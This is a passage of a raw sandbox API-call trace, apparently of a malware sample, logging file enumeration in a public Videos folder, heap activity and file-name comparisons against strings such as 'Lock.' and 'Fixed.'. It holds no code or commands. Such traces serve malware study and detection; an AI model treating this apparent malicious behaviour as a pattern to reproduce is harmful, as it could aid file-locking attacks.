0x24b17a8 [0268.246] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ac978, dwReserved1=0x25c6e50, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0268.246] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.246] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.247] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.247] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.248] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.248] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1818, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9f90, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x3153\x02\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\x95b8\x24a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0268.248] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.249] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.249] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0268.249] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.249] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.250] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.250] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0268.251] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0268.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0268.252] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0268.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0268.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0268.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0268.254] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0268.254] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0268.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3570 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0268.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.256] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0268.257] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.258] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0268.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.259] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.260] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0268.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0268.260] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos/desktop.ini", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0530, dwReserved1=0x14172, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa58e0 [0268.260] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0268.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0268.261] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, 